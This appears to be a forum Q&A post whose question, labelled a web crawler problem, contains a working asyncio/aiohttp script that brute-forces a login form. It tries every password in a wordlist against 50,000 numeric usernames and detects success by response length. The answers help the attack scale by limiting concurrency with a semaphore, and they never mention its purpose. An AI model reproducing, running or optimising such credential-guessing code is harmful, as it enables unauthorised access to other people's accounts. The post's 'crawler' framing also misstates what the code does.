Python aiohttp error message

A web crawler built with aiohttp and asyncio raises the following error when given too many URLs: ValueError: too many file descriptors in select()

import aiohttp
import asyncio
import time

start = time.perf_counter()  # time.clock() was removed in Python 3.8

# Load the password list, one candidate per line
pwd_all = []
with open("pwd.txt", "r", encoding="utf-8") as fob:
    for line in fob:
        pwd_all.append(line.strip())

oklist = []

async def hello(name):
    async with aiohttp.ClientSession() as session:
        for pwd in pwd_all:
            payload = {'name': name, 'password': pwd}
            async with session.post('http://www.xxxxxxx.com', data=payload) as resp:
                backdata = await resp.text()
                if len(backdata) == 376:  # response length marks a successful login
                    oklist.append("{}:{}".format(name, pwd))
                    break

loop = asyncio.get_event_loop()
tasks = [hello(str(uname)) for uname in range(10000, 60000)]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
print(oklist)
print("time is: " + str(time.perf_counter() - start))

2 Answers

tasks = [hello(str(uname)) for uname in range(10000, 12000)]
Shrink the range first. Launching 50,000 coroutines right off the bat is asking for trouble.

On Windows, asyncio's default event loop is built on select(), which can only watch a limited number of sockets (512 on Windows builds of Python, 1024 on most Unix systems); opening more concurrent connections than that raises this error. So it's best to limit how many coroutines run at once.
You can do that with a semaphore, asyncio.Semaphore(number), like this:

sem = asyncio.Semaphore(10)  # cap on concurrent coroutines

async def hello(name):
    async with sem:  # at most 10 coroutines proceed past this point
        '''
        your code ....
        '''

tasks = [asyncio.ensure_future(hello(str(uname))) for uname in range(10000, 60000)]
loop.run_until_complete(asyncio.gather(*tasks))
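To make the semaphore idea concrete, here is a self-contained sketch that swaps the real HTTP POST for asyncio.sleep() and tracks how many coroutines run at once; simulate_request, state, and the counter names are illustrative, not part of aiohttp:

```python
import asyncio

async def main():
    # Create the semaphore inside the running loop (safest across
    # Python versions); 10 is an arbitrary illustrative cap.
    sem = asyncio.Semaphore(10)
    state = {"active": 0, "peak": 0}

    async def simulate_request(name):
        async with sem:  # wait here until one of the 10 slots frees up
            state["active"] += 1
            state["peak"] = max(state["peak"], state["active"])
            await asyncio.sleep(0.01)  # stands in for the real network call
            state["active"] -= 1

    # 200 tasks queued, but only 10 ever run concurrently
    tasks = [asyncio.ensure_future(simulate_request(str(n)))
             for n in range(10000, 10200)]
    await asyncio.gather(*tasks)
    return state["peak"]

peak = asyncio.run(main())
print("peak concurrency:", peak)  # never exceeds the semaphore limit
```

In a real crawler you would also want to share a single ClientSession across requests; aiohttp can additionally cap connections at the transport level via aiohttp.TCPConnector(limit=...).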